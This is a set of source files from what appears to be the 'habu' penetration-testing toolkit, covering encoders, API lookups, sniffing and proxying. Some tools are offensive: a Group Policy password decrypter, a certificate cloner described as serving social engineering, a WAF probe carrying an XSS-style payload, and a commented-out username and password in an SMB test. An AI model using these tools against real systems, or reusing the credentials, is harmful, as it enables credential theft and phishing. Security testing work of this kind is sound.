#!/usr/bin/env python3

import base64
import os
import sys

import click


@click.command()
@click.argument('f', type=click.File('rb'), default='-')
@click.option('-d', 'do_decode', is_flag=True, default=False, help='decode instead of encode')
def cmd_b64(f, do_decode):
    """
    Encodes or decode data in base64, just like the command base64.

    \b
    $ echo awesome | habu.b64
    YXdlc29tZQo=

    \b
    $ echo YXdlc29tZQo= | habu.b64 -d
    awesome
    """

    data = f.read()

    if not data:
        print("Empty file or string!")
        return 1

    if do_decode:
        os.write(sys.stdout.fileno(), base64.b64decode(data))
    else:
        os.write(sys.stdout.fileno(), base64.b64encode(data))


if __name__ == '__main__':
    cmd_b64()



#!/usr/bin/env python3

import click

from habu.lib.xor import xor


@click.command()
@click.option('-k', default='0', help='Encryption key')
@click.option('-i', type=click.File('rb'), default='-', help='Input file (default: stdin)')
@click.option('-o', type=click.File('wb'), default='-', help='Output file (default: stdout)')
def cmd_xor(k, i, o):
    """XOR cipher.

    Note: XOR is not a 'secure cipher'. If you need strong crypto you must use
    algorithms like AES. You can use habu.fernet for that.

    Example:

    \b
    $ habu.xor -k mysecretkey -i /bin/ls > xored
    $ habu.xor -k mysecretkey -i xored > uxored
    $ sha1sum /bin/ls uxored
    $ 6fcf930fcee1395a1c95f87dd38413e02deff4bb  /bin/ls
    $ 6fcf930fcee1395a1c95f87dd38413e02deff4bb  uxored
    """

    o.write(xor(i.read(), k.encode()))


if __name__ == '__main__':
    cmd_xor()






import ftplib

class AuthBase():

    def __init__(self, **kwargs):
        print(kwargs)

    def authenticate(self):
        return True


class FTP(AuthBase):

    def authenticate(self):
        with ftplib.FTP(host="ftp1.at.proftpd.org") as ftp:
            try:
                ftp.login(user="anonymous", passwd="auth")
                return True
            except ftplib.error_perm:
                return False


class SMB(AuthBase):

    def authenticate(self):

        from smb.SMBConnection import SMBConnection

        # There will be some mechanism to capture userID, password, client_machine_name, server_name and server_ip
        # client_machine_name can be an arbitary ASCII string
        # server_name should match the remote machine name, or else the connection will be rejected

        #userID = 'xatportantier'
        userID = 'guest'
        #password = 'SecurFMP_23'
        password = ''
        client_machine_name = 'fmp'
        server_ip = '192.1.3.120'
        server_name = 'Server72'
        server_name = ''

        from nmb.NetBIOS import NetBIOS

        nb = NetBIOS(broadcast=True, listen_port=0)
        #print('ip', nb.queryName(server_name, port=445))
        #print('name', nb.queryIPForName(server_ip))


        conn = SMBConnection(userID, password, client_machine_name, server_name, use_ntlm_v2=True, is_direct_tcp=False)
        from pprint import pprint
        for a in [ 'capabilities', 'domain', 'host_type', 'log', 'my_name', 'remote_name', 'security_mode', 'uid', 'username' ]:
            print(a, getattr(conn, a))
        #print('cap', conn.capabilities)
        #print('domain', conn.domain)

        print('auth', conn.connect(server_ip, 139))
        #print(conn.isUsingSMB2)
        #print(conn.echo('aaaaa'))
        #conn.listShares()

if __name__ == '__main__':
    auth = SMB()
    print(auth.authenticate())


'''
 'auth_result',
 'capabilities',
 'close',
 'connect',
 'connected_trees',
 'createDirectory',
 'data_buf',
 'data_nmb',
 'deleteDirectory',
 'deleteFiles',
 'domain',
 'echo',
 'feedData',
 'getAttributes',
 'has_authenticated',
 'has_negotiated',
 'host_type',
 'isUsingSMB2',
 'is_busy',
 'is_direct_tcp',
 'is_signing_active',
 'is_using_smb2',
 'listPath',
 'listShares',
 'listSnapshots',
 'log',
 'max_buffer_size',
 'max_mpx_count',
 'max_raw_size',
 'max_read_size',
 'max_transact_size',
 'max_write_size',
 'mid',
 'my_name',
 'next_rpc_call_id',
 'next_signing_id',
 'onAuthFailed',
 'onAuthOK',
 'onNMBSessionFailed',
 'onNMBSessionMessage',
 'onNMBSessionOK',
 'password',
 'pending_requests',
 'remote_name',
 'rename',
 'requestNMBSession',
 'resetFileAttributes',
 'retrieveFile',
 'retrieveFileFromOffset',
 'security_mode',
 'sendNMBMessage',
 'sendNMBPacket',
 'session_id',
 'sign_options',
 'signing_challenge_response',
 'signing_session_key',
 'smb_message',
 'sock',
 'storeFile',
 'storeFileFromOffset',
 'uid',
 'use_ntlm_v2',
 'use_plaintext_authentication',
 'username',
 'write']
'''



#!/usr/bin/env python3

import hashlib
import json
import logging
import os
import sys
from pathlib import Path
from time import sleep

import click
import requests

from habu.lib.loadcfg import loadcfg


@click.command()
@click.argument('input', type=click.File('rb'))
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_virustotal(input, verbose):
    """Send a file to VirusTotal https://www.virustotal.com/ and print the report in JSON format.

    Note: Before send a file, will check if the file has been analyzed before (sending the
    sha256 of the file), if a report exists, no submission will be made, and you will
    see the last report.

    \b
    $ habu.virustotal meterpreter.exe
    Verifying if hash already submitted: f4826b219aed3ffdaa23db26cfae611979bf215984fc71a1c12f6397900cb70d
    Sending file for analysis
    Waiting/retrieving the report...
    {
        "md5": "0ddb015b5328eb4d0cc2b87c39c49686",
        "permalink": "https://www.virustotal.com/file/c9a2252b491641e15753a4d0c4bb30b1f9bd26ecff2c74f20a3c7890f3a1ea23/analysis/1526850717/",
        "positives": 49,
        "resource": "c9a2252b491641e15753a4d0c4bb30b1f9bd26ecff2c74f20a3c7890f3a1ea23",
        "response_code": 1,
        "scan_date": "2018-05-20 21:11:57",
        "scan_id": "c9a2252b491641e15753a4d0c4bb30b1f9bd26ecff2c74f20a3c7890f3a1ea23-1526850717",
        "scans": {
            "ALYac": {
                "detected": true,
                "result": "Trojan.CryptZ.Gen",
                "update": "20180520",
                "version": "1.1.1.5"
            },
            ... The other scanners ...
        },
        "sha1": "5fa33cab1729480dd023b08f7b91a945c16d0a9e",
        "sha256": "c9a2252b491641e15753a4d0c4bb30b1f9bd26ecff2c74f20a3c7890f3a1ea23",
        "total": 67,
        "verbose_msg": "Scan finished, information embedded"
    }
    """

    habucfg = loadcfg()

    if 'VIRUSTOTAL_APIKEY' not in habucfg:
        logging.error('You must provide a virustotal apikey. Use the ~/.habu.json file (variable VIRUSTOTAL_APIKEY), or export the variable HABU_VIRUSTOTAL_APIKEY')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    filename = Path(input.name).name

    data = input.read()

    sha256 = hashlib.sha256(data).hexdigest()

    logging.info('Verifying if hash already submitted: {}'.format(sha256))

    params = {'apikey': habucfg['VIRUSTOTAL_APIKEY'], 'resource': sha256}
    response = requests.post('https://www.virustotal.com/vtapi/v2/file/rescan', params=params)

    if response.status_code != 200 or response.json()['response_code'] == 0:
        logging.info('Sending file for analysis')
        files = {'file': (filename, data)}
        params = {'apikey': habucfg['VIRUSTOTAL_APIKEY']}
        response = requests.post('https://www.virustotal.com/vtapi/v2/file/scan', files=files, params=params)
        json_response = response.json()

        resource = json_response['resource']

    logging.info('Waiting/retrieving the report...')

    while True:
        params = {'apikey': habucfg['VIRUSTOTAL_APIKEY'], 'resource': sha256}
        response = requests.get('https://www.virustotal.com/vtapi/v2/file/report', params=params)

        if response.status_code == 200:
            json_response = response.json()
            if json_response['response_code'] == 1:
                break

        sleep(5)

    print(json.dumps(json_response, indent=4, sort_keys=True))

if __name__ == '__main__':
    cmd_virustotal()



import json
import logging
import re
import sys
from pprint import pprint

import click
import regex as re
import requests
import requests_cache
from bs4 import BeautifulSoup


@click.command()
@click.argument('url')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_webheaders(url, no_cache, verbose):

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        requests_cache.install_cache('/tmp/habu_requests_cache')

    try:
        r = requests.get(url)
    except Exception as e:
        logging.error(e)
        sys.exit(1)

    pprint(dict(r.headers))

    # HSTS
    if not 'Strict-Transport-Security' in r.headers:
        print("NO HSTS")

    # X-Frame-Options
    if not 'X-Frame-Options' in r.headers:
        print("NO X-Frame-Options")

    # X-XSS-Protection
    if not 'X-XSS-Protection' in r.headers:
        print("NO X-XSS-Protection")

    if 'X-XSS-Protection' in r.headers and r.headers['X-XSS-Protection'] == 0:
        print("X-XSS-Protection disabled")

    if 'X-Content-Type-Options' not in r.headers:
        print("NO X-Content-Type-Options")

    if 'Content-Security-Policy' not in r.headers:
        print("NO Content-Security-Policy")

    if 'Server' in r.headers:
        print("Data divulgation by Server HTTP header")

    if 'X-Powered-By' in r.headers:
        print("Data divulgation by X-Powered-By HTTP header")

    if 'Public-Key-Pins' not in r.headers and 'Public-Key-Pins-Report-Only' not in r.headers:
        print("No Public-Key-Pins")


if __name__ == '__main__':
    cmd_webheaders()



import ipaddress
import socket
from time import sleep

from dns import resolver, reversename

from habu.lib.tomorrow3 import threads


@threads(50)
def __threaded_query(hostname):
    """Perform the requests to the DNS server."""
    try:
        answer = resolver.query(hostname)
        return answer
    except Exception:
        return None


def query_bulk(names):
    """Query server with multiple entries."""
    answers = [__threaded_query(name) for name in names]

    while True:
        if all([a.done() for a in answers]):
            break
        sleep(1)

    return [answer.result() for answer in answers]


def lookup_reverse(ip_address):
    """Perform a reverse lookup of IP address."""
    try:
        type(ipaddress.ip_address(ip_address))
    except ValueError:
        return {}

    record = reversename.from_address(ip_address)
    hostname = str(resolver.query(record, "PTR")[0])[:-1]
    return {'hostname': hostname}


def lookup_forward(name):
    """Perform a forward lookup of a hostname."""
    ip_addresses = {}

    addresses = list(set(str(ip[4][0]) for ip in socket.getaddrinfo(
        name, None)))

    if addresses is None:
        return ip_addresses

    for address in addresses:
        if type(ipaddress.ip_address(address)) is ipaddress.IPv4Address:
            ip_addresses['ipv4'] = address
        if type(ipaddress.ip_address(address)) is ipaddress.IPv6Address:
            ip_addresses['ipv6'] = address

    return ip_addresses



import logging
from time import sleep

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, conf, sr1, L3RawSocket, sniff

def packet_callback(packet):
    print(packet.summary())

@click.command()
#@click.argument('ip')
@click.option('-i', 'interface', default=None, help='Wich interface to use (default: auto)')
@click.option('-c', 'count', default=0, help='How many packets send (default: infinit)')
#@click.option('-t', 'timeout', default=2, help='Timeout in seconds (default: 2)')
#@click.option('-w', 'wait', default=1, help='How many seconds between packets (default: 1)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_sniffer(interface, count, verbose):

    if interface:
        conf.iface = interface

    sniff(prn=packet_callback, count=count)

    return True

if __name__ == '__main__':
    cmd_sniffer()



#!/usr/bin/env python3

from base64 import b64decode
from binascii import unhexlify

import click
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


@click.command()
@click.argument('password')
def decrypt_gpp(password):

    """
    Decrypt the password of local users added via Windows 2008 Group Policy Preferences.

    This value is the 'cpassword' attribute embedded in the Groups.xml file, stored in the domain controller's Sysvol share.

    Example:

    \b
    # habu.decrypt.gpp AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk
    testpassword
    """

    iv = b"\x00" * 16

    # add the '=' characters for padding, if needed
    password += "=" * ((4 - len(password) % 4) % 4)
    password = b64decode(password)

    key = """
    4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
    f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
    """.replace(" ","").replace("\n","")

    key = unhexlify(key)

    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
    decryptor = cipher.decryptor()
    plain = decryptor.update(password) + decryptor.finalize()

    print(plain.decode(errors='ignore'))


if __name__ == '__main__':
    decrypt_gpp()



#!/usr/bin/env python3

import shlex
import subprocess
import sys
from pathlib import Path
from shutil import which
from time import sleep

import click

from habu.lib.web_screenshot import web_screenshot


@click.command()
@click.argument('url')
@click.option('-b', 'browser', default=None, type=click.Choice(['firefox', 'chromium-browser']), help='Browser to use for screenshot.')
@click.option('-o', 'outfile', default='screenshot.png', help='Output file. (default: screenshot.png)')
def cmd_web_screenshot(url, outfile, browser):
    """Uses Firefox or Chromium to take a screenshot of the website.

    \b
    $ habu.web.screenshot https://www.portantier.com
    """

    web_screenshot(url, outfile, browser=browser)

if __name__ == '__main__':
    cmd_web_screenshot()



#!/usr/bin/env python3

import html
import sys
import urllib.request
from pathlib import Path

import click

from habu.lib.web_screenshot import web_screenshot


@click.command()
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-b', 'browser', default=None, type=click.Choice(['firefox', 'chromium-browser']), help='Browser to use for screenshot.')
@click.argument('input_file', type=click.File('rb'), default='-')
def cmd_web_report(input_file, verbose, browser):
    """Uses Firefox or Chromium to take a screenshot of the websites.

    Makes a report that includes the HTTP headers.

    The expected format is one url per line.

    Creates a directory called 'report' with the content inside.

    \b
    $ echo https://www.portantier.com | habu.web.report
    """

    urls = input_file.read().decode().strip().split('\n')

    report_dir = Path('report')

    try:
        report_dir.mkdir()
    except Exception:
        pass

    report_file = report_dir / 'index.html'

    with report_file.open('w') as outfile:
        outfile.write('<!doctype html>\n')
        outfile.write('<html lang=en-us>\n')
        outfile.write('<meta charset=utf-8>\n')
        outfile.write('<title>habu.web.report</title>\n')
        outfile.write('<body>\n')
        outfile.write('<table border=1 style="max-width: 100%">\n')

        for i,url in enumerate(sorted(urls)):

            error = False

            print(i, url, file=sys.stderr)

            outfile.write('<tr>\n')
            outfile.write('<td style="vertical-align:top;max-width:30%">\n')
            outfile.write('<p><strong>' + html.escape(url) + '</strong></p>\n')

            try:
                req = urllib.request.Request(url, method='HEAD')
                resp = urllib.request.urlopen(req)
                outfile.write('<pre style="white-space: pre-wrap;">' + html.escape(str(resp.headers)) + '</pre>\n')
            except Exception as e:
                outfile.write('<pre>ERROR: ' + html.escape(str(e)) + '</pre>\n')
                error = True

            outfile.write('</td><td>')

            if not error:
                web_screenshot(url, report_dir / '{}.png'.format(i), browser=browser)
                outfile.write('<img src={}.png style="max-width: 100%" />\n'.format(i))

            outfile.write('</td>\n')
            outfile.write('</tr>\n')

        outfile.write('</table>\n')
        outfile.write('</body>\n')
        outfile.write('</html>\n')


if __name__ == '__main__':
    cmd_web_report()



#import ipaddress
#from habu.lib.ip2asn import ip2asn
#import json
import logging
#import socket
import sys

import regex as re
import click
import requests
from pprint import pprint


@click.command()
@click.argument('url')
def cmd_wafdetect(url):

    payload = '<script>select * from users where "`´</script>'

    print('Sending clean request ...')
    r = requests.get(url)

    print(r.status_code)

    #for cookie in r.cookies:
    #    if cookie.name in barracuda_cookies:
    #        print('Barracuda Networks WAF detected!')
    #        break

    for h,v in r.headers.items():
        print(h, v)


    print('Sending bad request ...')
    #r = requests.get(url, headers={'X-Bad-Header' : payload}, data={'bad-data': payload})
    r = requests.get(url, headers={'X-Bad-Header' : payload})

    print(r.status_code)
    print(len(r.content))

    if r.status_code != 200:
        print(r.content)

    #URL = 'https://karma.securetia.com/api/ip/'

    #try:
    #    resolved = socket.gethostbyname(host)
    #except Exception:
    #    logging.error('Invalid IP address or hostname')
    #    sys.exit(1)

    #if host != resolved:
    #    print(host, '->', resolved, file=sys.stderr)

    #r = requests.get(URL + resolved, headers={'Accept': 'application/json'})

    #if r.status_code != 200:
    #    logging.error('HTTP Error code received: {}'.format(r.status_code))
    #    sys.exit(1)

    #print(json.dumps(r.json(), indent=4))

if __name__ == '__main__':
    cmd_wafdetect()





#!/usr/bin/env python3

import json
import warnings

import click

# next lines because the pypi package python-whois uses the namespace 'whois' and
# the Debian python3-pywhois uses the namespace 'pywhois' at least on 2018-11-03
try:
    import pywhois as whois
except ModuleNotFoundError:
    import whois


def remove_duplicates(data):
    for key in data.keys():
        if type(data[key]) == type([]):
            if hasattr(data[key][0], 'lower'):
                data[key] = list(set([ item.lower() for item in data[key] ]))
            else:
                data[key] = data[key][0]

    if type(data['domain_name']) == type([]):
        data['domain_name'] = data['domain_name'][0]

    return data


@click.command()
@click.argument('domain')
def cmd_whois_domain(domain):
    """Simple whois client to check domain names.

    Example:

    \b
    $ habu.whois.domain portantier.com
    {
        "domain_name": "portantier.com",
        "registrar": "Amazon Registrar, Inc.",
        "whois_server": "whois.registrar.amazon.com",
        ...
    """

    warnings.filterwarnings("ignore")

    data = whois.whois(domain)
    data = remove_duplicates(data)

    print(json.dumps(data, indent=4, default=str))

if __name__ == '__main__':
    cmd_whois_domain()



#!/usr/bin/env python3

import json
import logging
import os
import os.path
import pwd
import sys

import click
import requests
import requests_cache

from habu.lib.loadcfg import loadcfg

def pretty_print(data):

    output = ''

    for timeline in reversed(data['timeline']):
        for event in timeline['events']:
            output += '{} {}\n'.format(event['created'], event['title'])

    return output


@click.command()
@click.argument('ip')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-o', 'output', type=click.File('w'), default='-', help='Output file (default: stdout)')
@click.option('-p', 'pretty', is_flag=True, default=False, help='Pretty output')
def cmd_cymon_ip_timeline(ip, no_cache, verbose, output, pretty):
    """Simple cymon API client.

    Prints the JSON result of a cymon IP timeline query.

    Example:

    \b
    $ habu.cymon.ip.timeline 8.8.8.8
    {
        "timeline": [
            {
                "time_label": "Aug. 18, 2018",
                "events": [
                    {
                        "description": "Posted: 2018-08-18 23:37:39 CEST IDS Alerts: 0 URLQuery Alerts: 1 ...",
                        "created": "2018-08-18T21:39:07Z",
                        "title": "Malicious activity reported by urlquery.net",
                        "details_url": "http://urlquery.net/report/b1393866-9b1f-4a8e-b02b-9636989050f3",
                        "tag": "malicious activity"
                    }
                ]
            },
            ...
    """

    habucfg = loadcfg()

    if 'CYMON_APIKEY' not in habucfg:
        print('You must provide a cymon apikey. Use the ~/.habu.json file (variable CYMON_APIKEY), or export the variable HABU_CYMON_APIKEY')
        print('Get your API key from https://www.cymon.io/')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache')

    url = 'https://www.cymon.io:443/api/nexus/v1/ip/{}/timeline/'.format(ip)
    headers = { 'Authorization': 'Token {}'.format(habucfg['CYMON_APIKEY']) }

    r = requests.get(url, headers=headers)

    if r.status_code not in [200, 404]:
        print('ERROR', r)
        return False

    if r.status_code == 404:
        print("Not Found")
        return False

    data = r.json()

    if pretty:
        output.write(pretty_print(data))
    else:
        output.write(json.dumps(data, indent=4))
        output.write('\n')

if __name__ == '__main__':
    cmd_cymon_ip_timeline()



#!/usr/bin/env python3
import json
import logging
import sys

import click

from habu.lib.http import get_options


@click.command()
@click.argument('server')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
def cmd_http_options(server, verbose):
    """Retrieve the available HTTP methods of a web server.

    Example:

    \b
    $ habu.http.options -v http://google.com
    {
        "allowed": "GET, HEAD"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if verbose:
        print("[-] Retrieving the HTTP headers of the server...")

    options = get_options(server)

    if type(options) is dict:
        print(json.dumps(options, indent=4))
        if verbose:
            print("[+] HTTP options from {} retrieved".format(server))
    else:
        print("[X] {}".format(options), file=sys.stderr)

    return True


if __name__ == '__main__':
    cmd_http_options()




#!/usr/bin/env python3

import logging
import random

import click

from habu.lib.loadcfg import loadcfg


@click.command()
@click.option('-l', 'lowest', type=click.IntRange(1,65534, clamp=True), default=1025, help='Lowest port to consider')
@click.option('-h', 'highest', type=click.IntRange(2,65535, clamp=True), default=65535, help='Highest port to consider')
def cmd_nmap_excluded(lowest, highest):
    """
    Prints a random port that is not present on nmap-services file so is not scanned automatically by nmap.

    Useful for services like SSH or RDP, that are continuously scanned on their default ports.

    Example:

    \b
    # habu.nmap.excluded
    58567
    """

    if lowest >= highest:
        logging.error('lowest can not be greater or equal than highest')

    cfg = loadcfg()

    with (cfg['DATADIR'] / 'nmap-services').open() as nsf:
        nmap_services = nsf.read()

    unwanted = set()

    for line in nmap_services.strip().split('\n'):
        if line.startswith('#'):
            continue

        service,port,_ = line.split('\t', maxsplit=2)
        unwanted.add(int(port.split('/')[0]))

    choices = list(range(lowest,highest))
    random.shuffle(choices)

    found = False
    for choice in choices:
        if choice not in unwanted:
            print(choice)
            found = True
            break

    if not found:
        logging.error('Can\'t find a port number with the specified parameters')

if __name__ == '__main__':
    cmd_nmap_excluded()



#!/usr/bin/env python3

import json
import logging
import os
import os.path
import pwd
import sys

import click

from habu.lib.loadcfg import loadcfg
from habu.lib.shodan import shodan_get_result

@click.command()
@click.argument('ip')
@click.option('-c', 'no_cache', is_flag=True, default=False, help='Disable cache')
@click.option('-j', 'json_output', is_flag=True, default=False, help='Output in JSON format')
@click.option('-x', 'nmap_command', is_flag=True, default=False, help='Output an nmap command to scan open ports')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-o', 'output', type=click.File('w'), default='-', help='Output file (default: stdout)')
def cmd_shodan_open(ip, no_cache, json_output, nmap_command, verbose, output):
    """Output the open ports for an IP against shodan (nmap format).

    Example:

    \b
    $ habu.shodan.open 8.8.8.8
    T:53,U:53
    """

    habucfg = loadcfg()

    if 'SHODAN_APIKEY' not in habucfg:
        print('You must provide a shodan apikey. Use the ~/.habu.json file (variable SHODAN_APIKEY), or export the variable HABU_SHODAN_APIKEY')
        print('Get your API key from https://www.shodan.io/')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = shodan_get_result(ip, habucfg['SHODAN_APIKEY'], no_cache, verbose)
    ports = []

    if 'data' in data:
        for service in data['data']:
            ports.append('{}:{}'.format(
                service['transport'][0].upper(),
                service['port']
            ))

    if nmap_command:
        if ports:
            output.write('nmap -A -v -p {} {}'.format(','.join(ports), ip))
    else:
        if json_output:
            output.write(json.dumps(ports, indent=4))
            output.write('\n')
        else:
            output.write(','.join(ports))

if __name__ == '__main__':
    cmd_shodan_open()



import os
from pathlib import Path

#FILEDIR = os.path.dirname(os.path.abspath(__file__))
FILEDIR = Path(os.path.dirname(os.path.abspath(__file__)))
#DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data'))
DATADIR = Path(FILEDIR / 'data') #os.path.abspath(os.path.join(FILEDIR, '../data'))
workspace = '/tmp/habu-workspace'

SERVICES_FILE_TCP = os.path.abspath(os.path.join(DATADIR, 'services-tcp'))
SERVICES_FILE_UDP = os.path.abspath(os.path.join(DATADIR, 'services-udp'))

config = {
    'FILEDIR' : Path(os.path.dirname(os.path.abspath(__file__))),
    'DATADIR' : Path(FILEDIR / 'data'),
}

if __name__ == '__main__':
    print(FILEDIR)
    print(DATADIR)
    print(config)





#!/usr/bin/env python3

import json
import logging

import click
import regex as re


def extract_email(data):

    regexp = re.compile(r"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")

    match = regexp.finditer(data)

    result = []

    for m in match:
        result.append(m.group(0))

    return result


@click.command()
@click.argument('infile', type=click.File('r'), default='-')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose output')
@click.option('-j', 'jsonout', is_flag=True, default=False, help='JSON output')
def cmd_extract_email(infile, verbose, jsonout):
    """Extract email addresses from a file or stdin.

    Example:

    \b
    $ cat /var/log/auth.log | habu.extract.email
    john@securetia.com
    raven@acmecorp.net
    nmarks@fimax.com
    """

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = infile.read()

    result = []

    result = extract_email(data)

    if jsonout:
        print(json.dumps(result, indent=4))
    else:
        print('\n'.join(result))


if __name__ == '__main__':
    cmd_extract_email()



from time import sleep
from habu.lib.tomorrow3 import threads
import requests

@threads(50)
def __threaded_request(url):
    return requests.get(url)


def threaded_request(urls):

    answers = [__threaded_request(url) for url in urls]

    while True:
        if all([ a.done() for a in answers]):
            break
        sleep(1)




    return answers



#!/usr/bin/env python3

import socket
import ssl

import click

from habu.lib.certclone import certclone


@click.command()
@click.argument('hostname')
@click.argument('port')
@click.argument('keyfile', type=click.File('w'))
@click.argument('certfile', type=click.File('w'))
@click.option('--copy-extensions', 'copy_extensions', is_flag=True, default=False, help='Copy certificate extensions (default: False)')
@click.option('--expired', 'expired', is_flag=True, default=False, help='Generate an expired certificate (default: False)')
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
def cmd_certclone(hostname, port, keyfile, certfile, copy_extensions, expired, verbose):
    """
    Connect to an SSL/TLS server, get the certificate and generate
    a certificate with the same options and field values.

    Note: The generated certificate is invalid, but can be used for social engineering attacks

    Example:

    \b
    $ habu.certclone www.google.com 443 /tmp/key.pem /tmp/cert.pem
    """

    context = ssl.create_default_context()

    with socket.create_connection((hostname, port), timeout=3) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as ssock:
            original = ssock.getpeercert(binary_form=True)

    key, cert = certclone(original, copy_extensions=copy_extensions, expired=expired)

    keyfile.write(key)
    certfile.write(cert)


if __name__ == '__main__':
    cmd_certclone()



#!/usr/bin/env python3

import logging

import click

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import ICMP, IP, TCP, UDP, conf, sr1


@click.command()
@click.argument('ip')
@click.option('-p', 'port', default=80, help='Port to use (default: 80)')
@click.option('-i', 'iface', default=None, help='Interface to use')
def cmd_traceroute(ip, port, iface):
    """TCP traceroute.

    Identify the path to a destination getting the ttl-zero-during-transit messages.

    Note: On the internet, you can have various valid paths to a device.

    Example:

    \b
    # habu.traceroute 45.77.113.133
    IP / ICMP 192.168.0.1 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror
    IP / ICMP 10.242.4.197 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding
    IP / ICMP 200.32.127.98 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding
    .
    IP / ICMP 4.16.180.190 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror
    .
    IP / TCP 45.77.113.133:http > 192.168.0.5:ftp_data SA / Padding

    Note: It's better if you use a port that is open on the remote system.
    """

    conf.verb = False

    if iface:
        conf.iface = iface

    pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port)

    for pkt in pkts:

        ans = sr1(pkt, timeout=1, iface=conf.iface)

        if not ans:
            print('.')
            continue

        print(ans.summary())

        if TCP in ans and ans[TCP].flags == 18:
            break

    return True


if __name__ == '__main__':
    cmd_traceroute()



#!/usr/bin/env python
"""
TCP Proxy server.  Listens on a port for connections, initiates
a connection to the real server, and copies data between the
two connections.  Optionally logs the data.

TODO:
    - non-blocking connect ?
    - possibly do non-blocking ssl handshaking?
    - cleaner shutdown?
"""

from socket import *
import errno, optparse, os, platform, socket, ssl, struct, time
from select import *

class Error(Exception) :
    pass

def fail(fmt, *args) :
    print("error:", fmt % args)
    raise SystemExit(1)

def tcpListen(six, addr, port, blk, sslProto, cert=None, key=None) :
    """Return a listening server socket."""
    s = socket.socket(AF_INET6 if six else AF_INET, SOCK_STREAM)
    if six and hasattr(socket, 'IPV6_V6ONLY') :
        s.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, 0)
    s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
    if sslProto is not None :
        if not os.path.exists(cert) :
            fail("cert file %s doesnt exist", cert)
        if key and not os.path.exists(key) :
            fail("cert key %s doesnt exist", key)
        s = ssl.wrap_socket(s, ssl_version=sslProto, server_side=True, certfile=cert, keyfile=key)
    s.bind((addr,port))
    s.listen(5)
    s.setblocking(blk)
    return s

def tcpConnect(six, addr, port, blk, sslProto, clientCert=None) :
    """Returned a connected client socket (blocking on connect...)"""
    s = socket.socket(AF_INET6 if six else AF_INET, SOCK_STREAM)
    s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
    if sslProto is not None :
        if clientCert is None:
            certfile = None
            keyfile = None
        else:
            certfile = clientCert + '.cert'
            keyfile = clientCert + '.key'
        s = ssl.wrap_socket(s, certfile=certfile, keyfile=keyfile, cert_reqs=ssl.CERT_NONE, ssl_version=sslProto)
    s.connect((addr,port))
    s.setblocking(blk)
    return s

def safeClose(x) :
    try :
        x.close()
    except Exception as e :
        pass

def getSslVers(opt, enable) :
    if enable :
        if opt.sslV3 :
            return ssl.PROTOCOL_SSLv3
        elif opt.TLS :
            return ssl.PROTOCOL_TLSv1
        else :
            return ssl.PROTOCOL_SSLv23

class Server(object) :
    def __init__(self, opt, q) :
        self.opt = opt
        sslCert = opt.cert + ".pem"
        ver = getSslVers(opt, opt.sslIn)
        self.sock = tcpListen(opt.ip6, opt.bindAddr, opt.locPort, 0, ver, sslCert, None)
        self.q = q
    def preWait(self, rr, r, w, e) :
        r.append(self.sock)
    def postWait(self, r, w, e) :
        if self.sock in r :
            try :
                cl,addr = self.sock.accept()
            except ssl.SSLError as e :
                print("ssl error during accept", e)
                return
            cl.setblocking(0)
            self.q.append(Proxy(self.opt, cl, addr))
            if self.opt.oneshot :
                safeClose(self.sock)
                return 'elvis has left the building'

class Half(object) :
    """a single connection"""
    def __init__(self, opt, sock, addr, dir) :
        self.opt = opt
        self.sock = sock
        self.addr = addr
        self.dir = dir

        self.name = "peer" if self.dir else "client"
        self.queue = []
        self.dest = None
        self.err = None
        self.ready = False

        # XXX handle ssl

    def preWait(self, rr, r, w, e) :
        if self.ready :
            rr.append(self.sock)
        r.append(self.sock)
        if self.queue :
            w.append(self.sock)
    def postWait(self, r, w, e) :
        if not self.err and self.sock in w and self.queue :
            self.writeSome()
        if not self.err and self.sock in r :
            self.ready = True
            self.copy()
        return self.err

    def error(self, msg, e) :
        print("%s on %s: %r %s" % (msg, self.name, e, e))
        self.err = "error on " + self.name
        return self.err

    def writeSome(self) :
        try :
            n = self.sock.send(self.queue[0])
